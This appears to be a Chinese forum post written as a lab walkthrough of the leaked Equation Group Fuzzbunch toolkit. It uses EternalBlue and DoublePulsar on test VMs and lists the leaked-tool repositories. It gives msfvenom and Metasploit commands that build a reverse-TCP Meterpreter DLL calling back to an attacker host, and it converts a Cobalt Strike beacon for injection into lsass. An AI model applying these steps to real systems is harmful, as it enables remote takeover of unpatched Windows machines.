武器库历史说明
首先说明一下武器库的关系,我也理了好久。关于 shadowbroker 和 fuzzbunch。
|影子经纪(Shadow Brokers)声称攻破了为NSA开发网络武器的美国黑客团队方程式组织Equation Group黑客
组织的计算机系统,并下载了他们大量的攻击工具(包括恶意软件、私有的攻击框架及其它攻击工具)。
方程式组织(Equation Group)是一个由卡巴斯基实验室发现的尖端网络犯罪组织,后者将其称为世界上最尖端
的网络攻击组织之一同震网(Stuxnet)和火焰(Flame)病毒的制造者紧密合作且在幕后操作。
所以shadowbroker是影子组织公开的工具,其中包括了fuzzbunch&DanderSpritz,不仅如此还有其他工具:
windows:包含Windows漏洞、后门、利用工具,等配置文件信息;
swift:包含来自银行攻击的操作说;
oddjob:与ODDJOB后门相关的文档。
所以针对永恒之蓝的fuzzbunch工具包仅是沧海一粟,其中一部分。
网上的资料良莠不齐,只能自己踩坑摸索,加上最近法律颁布,以后安全圈真大变革,以后又将会何去何从。
Fuzzbunch
这里有几个坑,由于是泄漏出来的版本,github存在极多分支,其中最主要就是shadowbroker
所有工具包的和有仅有fuzzbunch。
shadowbroker:
https://github.com/x0rz/EQGRP_Lost_in_Translation
https://github.com/misterch0c/shadowbroker【fuzz少组件,没跑起】
fuzzbunch:
https://github.com/fuzzbunch/fuzzbunch【暂用这个】
https://github.com/exploitx3/FUZZBUNCH【有流程图,方便理解】
检测工具:
https://github.com/countercept/doublepulsar-detection-script
我在一个github找的shadowbroker工具跑的里面的buzzbunch没跑起来,原因后面找到了是
少了一些dll库这些库还不好从网上找,还是后面另开炉灶,下了一个单独的fuzzbunch跑起的
从这目录下找到了那些遗失的windll库。
在网上也找到类似报错,不同git仓库下,确实是不同,毕竟是泄漏版本,坑是巨多。
硬性环境要求
Prerequisites:
Windows 7以下
6(必须为32位版本)和pywin32
创建listeningposts目录;
修改xml
按需修改Resources,logs。
|建议修改logs为c:\logs,后续很省事。
功能介绍
目标识别和利用漏洞发现:
Architouch
Rpctouch
Domaintouch
Smbtouch
漏洞利用:
EternalBlue
Emeraldthread
Eclipsedwing
EternalRomance
目标攻击后后操作:
Douplepulsar
Regread
Regwrite
其插件主要有以下几部分:
Exploit 对应Windows目录下的\Exploits 目录,包括对Windows系统和应用软件的漏洞利用程序主要
是针对Windows系统SMB协议和对原Lotus (莲花公司,先已被IBM收购)邮件系统的攻击。
Implant 对应Windows目录下的\implants目录,功能为向目标机器植入指定的dll或exe程序。
Payload 对应Windows目录下的\payloads 目录,该目录中的模块插件主要用于Exploit插件模块攻击成功后
后续的执行操作插件,包括在受害者机器上安装后门、枚举进程、增删改查注册表项、RPC服务等。
Speical 对应Windows目录下的\specials 目录,该目录下Eternalblue和Eternalchampion的是比较新的2个
针对Windows SMB协议的利用程序,但在微软3月的补丁MS17-010中也已经修复。
Touch 对应Windows目录下的\touches 目录,主要功能是探测是否存在指定的漏洞和Exploit插件模块功能
相似但该部分仅仅起扫描探测的作用,不包含漏洞利用功能。
Smbtouch
然后我们通过使用Smbtouch使用smb协议来检测对方操作系统版本、架构、可利用的漏洞。
Eternalblue
Attack (win10) : 10.211.55.8
Attack(win7):10.211.55.9
靶机(win2k3):10.211.55.4
攻击机不能用Win10,打不成,换win7就好使。还是win7用起来舒服,动画看的也舒服也不消耗过多cpu资源。
不会就help,打?。
use eternalblue启动。
需注意几点
1. 这里记得选1> FB,0是生成一个dll。
2. 重定向那个选项也要注意,不要选yes。参照小丑竟是我自己。
通过返回的信息,可以看出攻击成功,用了不到10秒钟的时间,攻击成功之后并不能直接执
行命令,需要用框架的其他的插件配合。
第一次打成功的截图:
之后重复打就会这样。
攻击成功之后就可以开始使用DoublePulsar插件,DoublePulsar类似于一个注入器,有以下几个功能。
Ping: 检测后门是否部署成功。
RUNDLL:注入dll。
RunShellcode:注入shellcode。
Uninstall:用于卸载系统上的后门。
Doublepulsar
使用DoublePulsar配合上面的Eternalblue完成dll注入。
注意:msf生成的dll注入到win7进程的时候,win7可能会重启。
MSF上线
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.211.55.15 LPORT=4444 -f dll > 4444.dll
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
use doublepulsar
Bash
第一次打失败了,弹了但是没有完全弹回。选的是SMB,x64,lsass.exe。
遇到的一些问题:
发现msf的payload选错
msf反弹shell的地方没选payload,用的默认的,岂可修,已经好几次这样犯错了。可恶~!
修改后再无法成功。
但我修改了之后还是没有成功,是不是之前已经注入过了,搞了没有办法重新注入。而且上面永恒之蓝的
打法也是打了一次就记住了,现在也不知道在哪删痕迹,都是陌生的一切。
莫名原因重启之后,一切重来,一切正常。
CS上线
但平时还是cs用得多一点。试试cs的dll效果如何。
|网上言论:“开始采用CS后门dll发现,执行使目标机器蓝屏重启几率较大,成功率较低。”
当然实际情况,内网的基本不出网,所以直接上cs不实用。还是打远程桌面比较香。
网上言论:“开始采用CS后门dll发现,执行使目标机器蓝屏重启几率较大,成功率较低。
cs—dll盲目操作导致报错
win7只要一打cs的dll,秒报错。
msf转换payload
参考链接:http://www.dark5.net/blog/2019/06/26/Cobalt-Strike-DLL用于永恒之蓝注入/
msfvenom -p generic/custom PAYLOADFILE=./beacon.bin -a x64 --platform windows -f dll -o csmsf.dll
注意cs的payload不能选windows那个,要选raw格式的dll。
小丑竟是我自己
打完cs之后,我发现上线的竟然是自己的攻击机Win7,我觉得不太对,IP都对着 怎么这样
重新打了一遍发现。小丑竟是我自己,自己上线自己。
发现之前的设置当中,有这么一步设定。
win2k8无法上线 [没解决]
https://beta.4hou.com/technology/12265.html
方程式可以上线,虽然报错,依旧上线。
DllOrdinal默认值为1,ytb演示视频为5。修改也没用。
嵌入类型:https://www.yxxtxbx.com/watch?v=B8kkHAa_ntk&t=248s
DoubleSpritz
DanderSpritz是后渗透工具,伴随武器库一同泄漏,可配合fuzzbunch使用。
在fuzzbunch攻击成功,在受害者机器上植入木马后,可以通过DanderSpritz对受害者机器进行远控制和操作。
网上说明文档极少,都是大伙踩过坑的辛酸泪:https://github.com/francisck/DanderSpritz_lab
首先准备好合适的jdk版本环境。
https://3gstudent.github.io/NSA-DanderSpiritz测试指南-木马生成与测试
不会,坑太多,溜了溜了。
不会,坑太多,溜了溜了。
不会,坑太多,溜了溜了。
17010莫名修复排查
本来一直存在17010的靶机,今天突然打不成了,我是惶恐不安呀,经过几番排查,的亏快照习惯好
恢复快照排查,发现后续安装软件的时候,存在这几个补丁。
卸载补丁。
nice,不亏耗费我快2小时,几个虚拟机疯狂调试,逐渐排查问题,关闭自动更新。over。 |
楼主